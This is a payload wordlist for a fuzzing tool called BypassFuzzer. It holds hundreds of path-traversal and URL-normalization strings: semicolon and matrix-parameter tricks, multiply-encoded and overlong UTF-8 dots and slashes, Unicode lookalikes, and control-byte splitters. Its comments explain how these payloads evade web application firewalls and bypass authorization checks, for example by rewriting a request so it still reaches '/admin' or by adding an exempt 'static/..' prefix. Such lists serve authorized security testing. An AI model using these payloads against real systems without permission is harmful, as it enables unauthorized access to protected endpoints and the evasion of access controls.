# ==============================================================================
# BypassFuzzer — URL / Path Normalization Payloads
# Lines starting with '#' are ignored. Blank lines are ignored.
# Each payload is wrapped into every path segment by UrlPayloadProcessor
# (prefix, suffix, and both) so keep payloads minimal — don't pre-pad them.
# ==============================================================================

# ------------------------------------------------------------------------------
# Semicolon / matrix-parameter tricks (Tomcat, Jetty, Spring, Undertow)
# ------------------------------------------------------------------------------
;
;?
;/
;/.;.
;/..
;/..;
;/../
;/../;/
;/../;/../
;/../.;/../
;/../../
;/../..//
;/.././../
;/..//
;/..//../
;/..///
;/..//%2e%2e/
;/..//%2f
;/../%2f/
;/..%2f
;/..%2f..%2f
;/..%2f/
;/..%2f//
;/..%2f%2e%2e%2f
;/..%2f%2f../
;/.%2e
;/.%2e/%2e%2e/%2f
;//
;//..
;//../../
;///..
;///../
;///..//
;//%2f../
;/%2e.
;/%2e%2e
;/%2e%2e/
;/%2e%2e%2f/
;/%2e%2e%2f%2e%2e%2f
;/%2e%2e%2f%2f
;/%2f/../
;/%2f/..%2f
;/%2f%2f../
;/%2e%2e%2f..%2f
;%09
;%09;
;%09..
;%09..;
;%2f;/;/..;/
;%2f;//../
;%2f..
;%2f..;/;//
;%2f..;//;/
;%2f..;///
;%2f../;/;/
;%2f../;/;/;
;%2f../;//
;%2f..//;/
;%2f..//;/;
;%2f..//../
;%2f..//..%2f
;%2f..///
;%2f..///;
;%2f../%2f../
;%2f../%2f..%2f
;%2f..%2f..%2f%2f
;%2f..%2f/
;%2f..%2f/../
;%2f..%2f/..%2f
;%2f..%2f%2e%2e%2f%2f
;%2f/;/..;/
;%2f/;/../
;%2f//..;/
;%2f//../
;%2f//..%2f
;%2f/%2f../
;%2f%2e%2e
;%2f%2e%2e%2f%2e%2e%2f%2f
;%2f%2f/../

# ------------------------------------------------------------------------------
# Query / fragment terminator probes — tagged [s] (suffix only) because prefix /
# sandwich injection of '?' or '#' into mid-path segments just creates malformed
# query strings, not path-norm tests.
# ------------------------------------------------------------------------------
[s]?
[s]?;
[s]??
[s]?#
[s]#
[s]#?

# ------------------------------------------------------------------------------
# Dot-segment normalization
# ------------------------------------------------------------------------------
.
.;
..
..;\
..;\;
..;%00/
..;%0d/
..;%ff/
../
..\
..\;
..%00;/
..%00/
..%00/;
..%01
..%09
..%0a
..%0d
..%0d;/
..%0d/
..%0d/;
..%5c
..%5c/
..%5c..%5c
..\..\
..%ff;/
..%ff/
..%ff/;
./
.//
/./
/.//
.%00
.%00/

# ------------------------------------------------------------------------------
# Slash / leading-slash variants
# ------------------------------------------------------------------------------
/
/;
/;?
/;/
/;/../
/;/../;/
/;/../;/../
/;/../.;/../
/;/../../
/;/../..//
/;/.././../
/;/..//
/;/..//../
/;/..///
/;/..//%2e%2e/
/;/..//%2f
/;/../%2f/
/;//
/;///
/?
/?;
/.
/.;
/.;/
/.;//
/..
/..;/
/..;/;/
/..;/;/..;/
/..;/..;/
/..;/../
/..;//
/..;//..;/
/..;//../
/..;%2f
/..;%2f..;%2f
/..;%2f..;%2f..;%2f
/..;/..;/..;/..;/
/..;/..;/..;/..;/..;/
/../
/../;/
/../;/../
/../.;/../
/../..;/
/../../
/../../../
/../../..//
/../..//
/../..//../
/.././../
/..//
/..//..;/
/..//../
/..//../../
/..%2f
/..%2f..%2f
/..%2f..%2f..%2f
/..%2f..%2f..%2f..%2f
/.%00
/.%00/
//
//;
//;/
//.;/
//..
//..;
//../../
//./
///
///;
///;/
///..
///..;
///..;/
///..;//
///../
///..//
//%2f
//%ef%bc%8f

# Backslash paths (Windows / nginx edge cases)
\
\;
\..
\..\
\..\..
/\
/\..
/\..\
/..\
/..\..\

# ------------------------------------------------------------------------------
# Control / whitespace injection
# ------------------------------------------------------------------------------
/#
/%01
/%0a
/%0b
/%0c
/%0d
/%0d%0a
/%20
/%20#
/%20%23
/%23
/%09
/%09/
/%c2%a0
/%e2%80%8b

# ------------------------------------------------------------------------------
# Single-encoded dot / slash (with uppercase variants for case-sensitive decoders)
# ------------------------------------------------------------------------------
/%2e
/%2e/
/%2e//
/%2e%2e
/%2e%2e/
/%2e%2e%2f
/%2e%2e%2f/
/%2e%2e%3b/
/%2e%2f/
/%2e%3b/
/%2e%3b//
/%2f
/%2f/
/%3b/

# ------------------------------------------------------------------------------
# Double-encoded (+ uppercase decoder-case variants — e.g. React %252F vs %252f)
# ------------------------------------------------------------------------------
/%252e
/%252e/
/%252e%252e
/%252e%252e%252f/
/%252e%252e%253b/
/%252e%252f/
/%252e%253b/
/%252f
/%252f%252f
%252f/
%252f%252f

# ------------------------------------------------------------------------------
# Triple-encoded (encoded-percent of encoded-percent of char)
# ------------------------------------------------------------------------------
/%25%32%65
/%25%32%66
/%25%32%65/
/%25%32%66/
/%25%32%65%25%32%65/
/%25%32%65%25%32%65%25%32%66/

# ------------------------------------------------------------------------------
# Other encoded probes (root, hash, null)
# ------------------------------------------------------------------------------
/%2500
/%2523
/%253b
/%253f
/%e5%98%8a
/%e5%98%8d
/%ef%bc%8f
/%ef%bc%8f/

# IIS-style Unicode escape (legacy; %u + 4 hex digits)
/%u002e
/%U002E
/%u002e;
/%U002E;
/%u002e/%u002e
/%U002E/%U002E
/%u002e/%u002e;
/%u002f
/%U002F
/%u005c
/%U005C

# ------------------------------------------------------------------------------
# Bare single chars (at path root)
# ------------------------------------------------------------------------------
%01
%01;
%01..
%01/
%09
%09;
%09;/
%09..
%09..;
%09..;/
%09../
%09/
%09%3b
%0a
%0a;
%0a..
%0a/
%0b
%0c
%0d
%0d;
%0d..
%0d/
%0d%0a
%20
%20;
%20/
%23
%23%3f

# ------------------------------------------------------------------------------
# Bare encoded dot / slash / backslash / semicolon
# ------------------------------------------------------------------------------
%2e
%2e;
%2e;/
%2e;//
%2e;%2f
%2e;%2f%2f
%2e/
%2e//
%2e%2e
%2e%2e;
%2e%2e/
%2e%2e%2f
%2e%2f
%2e%2f%2f
%2f
%2f;?
%2f?;
%2f/
%2f//
%2f/%2f
%2f/%ef%bc%8f
%2f%20%23
%2f%23
%2f%2f
%2f%2f%2f
%2f%3b%2f
%2f%3b%2f%2f
%2f%3f
%2f%3f/
%2f%ef%bc%8f
%2f%ef%bc%8f%2f
%5c
%5c%5c
%255c

# ------------------------------------------------------------------------------
# Semicolon-prefixed encoded traversal
# ------------------------------------------------------------------------------
%3b
%3b/..
%3b//%2f../
%3b/%2e.
%3b/%2e%2e/..%2f%2f
%3b/%2f%2f../
%3b%09
%3b%2f..
%3b%2f%2e.
%3b%2f%2e%2e
%3b%2f%2e%2e%2f%2e%2e%2f%2f
%3f%23
%3f%3f

# ------------------------------------------------------------------------------
# Overlong UTF-8 — 2-byte (dot + slash + backslash)
# ------------------------------------------------------------------------------
%c0%ae
%c0%ae%c0%ae
%c0%ae%c0%ae%c0%af
%c0%af
%c0%af;%c0%af
%c0%af;%c0%af%c0%af
%c0%af.
%c0%af.;
%c0%af.;%c0%af
%c0%af.;%c0%af%c0%af
%c0%af.%c0%af
%c0%af.%c0%af%c0%af
%c0%af%c0%af
%c0%af%c0%af..
%c0%af%c0%af%c0%af
%c0%ae%c0%ae%2f
%c0%80

# ------------------------------------------------------------------------------
# Overlong UTF-8 — 3-byte
# ------------------------------------------------------------------------------
%e0%80%ae
%e0%80%af
%e0%80%ae%e0%80%ae
%e0%80%ae%e0%80%ae%e0%80%af
%e0%80%af%e0%80%af

# ------------------------------------------------------------------------------
# Overlong UTF-8 — 4-byte
# ------------------------------------------------------------------------------
%f0%80%80%ae
%f0%80%80%af
%f0%80%80%ae%f0%80%80%ae
%f0%80%80%ae%f0%80%80%ae%f0%80%80%af

# ------------------------------------------------------------------------------
# Unicode lookalikes (dot / slash / backslash)
# U+FF0E fullwidth full stop, U+FF0F fullwidth solidus,
# U+2215 division slash, U+2044 fraction slash, U+2216 set minus.
# ------------------------------------------------------------------------------
%ef%bc%8e
%ef%bc%8e%ef%bc%8e
%ef%bc%8e%ef%bc%8e%ef%bc%8f
%ef%bc%8f
%ef%bc%8f;%ef%bc%8f
%ef%bc%8f.
%ef%bc%8f.;
%ef%bc%8f.;%ef%bc%8f
%ef%bc%8f.;%ef%bc%8f%ef%bc%8f
%ef%bc%8f.%ef%bc%8f
%ef%bc%8f.%ef%bc%8f%ef%bc%8f
%ef%bc%8f%2f
%ef%bc%8f%ef%bc%8f
%ef%bc%8f%ef%bc%8f..
%ef%bc%8f%ef%bc%8f%ef%bc%8f
%e2%88%95
%e2%88%95%e2%88%95
%e2%81%84
%e2%88%96

# ------------------------------------------------------------------------------
# Splitter via stripped control chars
# Payloads that collapse to '..' or '//' only AFTER the server decodes %-encoding
# and strips whitespace/control bytes. WAFs inspecting the raw or once-decoded
# form see no '..' / '%2e%2e' and miss the traversal.
# Works against: fetch()-style URL parsers (literal \t\n\r), Apache/Tomcat/Jetty
# post-decode normalizers that strip whitespace, custom middleware trim logic.
# ------------------------------------------------------------------------------

# Dot-splitter-dot (collapses to '..' after control-byte stripping)
%2e%09%2e
%2e%0a%2e
%2e%0b%2e
%2e%0c%2e
%2e%0d%2e
%2e%20%2e
%2e%00%2e
%2e%c2%a0%2e
%2e%e2%80%8b%2e

# Full traversal with internal splitter
%2e%09%2e%2f
%2e%09%2e%5c
%2f%2e%09%2e%2f
%2f%2e%09%2e%5c
%2f%2e%09%2e%2f%2e%09%2e%2f
/.%09./
/.%0a./
/.%0d./
/.%20./
\.%09.\
/.%09.\
\.%09./

# Splitter between slashes / slash-backslash
%2f%09%2f
%2f%09%5c
%5c%09%2f
%2f%0a%2f
%2f%0d%2f
/%09\
\%09/

# Splitter adjacent to traversal token
%09..%2f
..%09/
..%09%2f
%2f%09..
%2f..%09
%2f..%09%2f
%2f..%09/..%09/

# Chained: full URL-shape bypass (variations of the quoted WAF-bypass payload)
%2f%2e%09%2e%5c%2e%09%2e

# ==============================================================================
# CLASSIFICATION TAG REFERENCE
#   [p]payload  prefix injection        (payload+segment, on each segment)
#   [s]payload  suffix injection        (segment+payload, on each segment)
#   [w]payload  sandwich injection      (payload+segment+payload)
#   [h]payload  HEAD insert             (new first segment, position 0 only)
#   [b]payload  BETWEEN insert          (new segment at every position)
#   [a]payload  all five of the above
#   (no tag)    default: p + s + w
# Notes for AuthZ-bypass use case:
#  - [h] is safe for traversal payloads (../, ..;, %2e%2e): /..;/admin still
#    normalizes to /admin on the server, preserving the target endpoint.
#  - [b] mid-path with traversal reroutes off-target (/api/..;/users -> /users).
#    Use [b] only for no-op payloads (., %2e) that normalize out harmlessly.
# Combine: [hb]payload = head + between. [sw]payload = suffix + sandwich.
# ==============================================================================

# ------------------------------------------------------------------------------
# HEAD insertion ([h]) — inserts traversal payload before the first segment.
# /..;/admin still resolves to /admin after server-side normalization, so the
# WAF sees a different request shape but the AuthZ-protected handler still runs.
# Non-zero BETWEEN positions would reroute off-target — use [h] not [b].
# ------------------------------------------------------------------------------
[h]..
[h]..;
[h]..%00
[h]..%09
[h]..%0d
[h]%2e%2e
[h]%2e%2e;
[h]%2e%2e%00
[h]..%2f..
[h]%2e%2e%2f%2e%2e
[h]..;..
[h]..;..;
[h]%c0%ae%c0%ae
[h]%ef%bc%8e%ef%bc%8e
[h]..%5c..
[h]..\..

# ------------------------------------------------------------------------------
# BETWEEN insertion ([b]) — no-op markers only. Safe at every position because
# they normalize out (. and %2e are current-directory, leave the target intact).
# ------------------------------------------------------------------------------
[b].
[b]%2e

# ------------------------------------------------------------------------------
# Sacrificial-prefix segment + traversal back ([h]) — classic AuthZ bypass:
#   /x/../admin normalizes to /admin. A WAF that doesn't normalize before the
#   ACL check sees the request match a different (non-ACLed) rule shape.
# Double win: 'static', 'public', 'assets' etc. are often explicitly exempted
# from AuthZ on many frameworks for asset serving — perfect sacrificial values.
# ------------------------------------------------------------------------------
# Anonymous placeholder (shortest possible)
[h]x/..
[h]x/../
[h]x/..;
[h]x/..;/
[h]x;/..
[h]x;/../
[h]x;/..;
[h]x//..
[h]x//../
[h]x/../x/..
[h]x%2f..
[h]x%2f..%2f
[h]x%2f%2e%2e
[h]x%2f%2e%2e%2f

# Alternate placeholder names (some routers skip specific single-char segments)
[h]a/..
[h]foo/..
[h]bar/..
[h]1/..

# WAF-whitelist prefixes (common AuthZ-exempt paths on many frameworks)
[h]static/..
[h]static/../
[h]public/..
[h]public/../
[h]assets/..
[h]assets/../
[h]images/..
[h]js/..
[h]css/..
[h]resources/..
[h]files/..
[h]uploads/..

# Exotic encodings of sacrificial + traversal
[h]%c0%af;x/..
[h]%c0%afx%c0%af..
[h]%ef%bc%8f;x/..
[h]%ef%bc%8fx%ef%bc%8f..
